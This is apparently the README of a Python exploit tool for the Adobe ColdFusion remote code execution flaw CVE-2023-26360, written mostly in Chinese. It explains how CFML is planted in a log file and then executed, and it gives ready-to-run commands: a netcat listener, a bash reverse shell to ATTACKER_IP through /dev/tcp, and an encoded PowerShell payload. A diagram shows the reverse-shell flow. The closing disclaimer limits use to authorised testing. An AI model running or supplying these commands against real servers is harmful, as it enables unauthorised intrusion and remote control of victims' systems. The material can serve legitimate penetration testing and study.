
This exploit is based on CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) and was built on top of the Metasploit module and the jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit.
针对 CVE-2023-26360 的 Python 远程代码执行漏洞利用实现,基于对原始 Metasploit 模块 的分析以及 jakabakos 的先前工作。
jakabakos 的概念验证尝试直接将 <cfexecute> 注入到 _variables 参数中,并在一项操作中从 ColdFusion 日志读取输出。这种方法失败,因为 ColdFusion 在该上下文中不会内联评估 CFML 标签,导致返回 500 错误且无代码执行。
本实现复现了 Metasploit 模块所使用的正确两步机制:
_variables 载荷({<cftry>CFML</cftry>)。ColdFusion 解析失败,会将原始内容(包括 CFML 代码)写入 coldfusion-out.log。命令执行通过 createObject 调用 java.lang.Runtime.exec() 实现,避免了任何对 <cfexecute> 的依赖(该标签在生产或强化部署环境中通常被禁用)。
pip install -r requirements.txt
运行漏洞利用前请开启监听器:
nc -lvnp 4444
Windows 目标:
python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"
Linux 目标:
python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
通过代理(例如 Burp Suite):
python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080
| 标志 | 描述 |
|---|---|
--host | 目标基础 URL(例如 http://192.168.1.10:8500) |
┌─────────────┐ 第1步:植入 CFML ┌──────────────────┐
│ 攻击者 │ ──── POST /_variables={<cftry>... ──► iedit.cfc │
│ │ CF 解析失败,记录 CFML │ │
│ │ │ coldfusion- │
│ │ 第2步:触发执行 │ out.log │
│ │ ──── POST classname=X..\logs\cf... ──► (作为 CFML 模板 │
│ │ │ 加载) │
│ 监听器 │ ◄─────────────── 反弹 shell ─────────│ │
└─────────────┘ └──────────────────┘
本工具仅用于教育目的和授权的安全评估(渗透测试、CTF、实验室环境)。在未经明确书面许可的情况下对系统运行此漏洞利用是违法的。作者对任何滥用行为不承担任何责任。
--cmd | 在目标上执行的命令 |
--win | 如果目标是 Windows 主机,请设置此标志 |
--proxy | 可选 HTTP 代理 URL |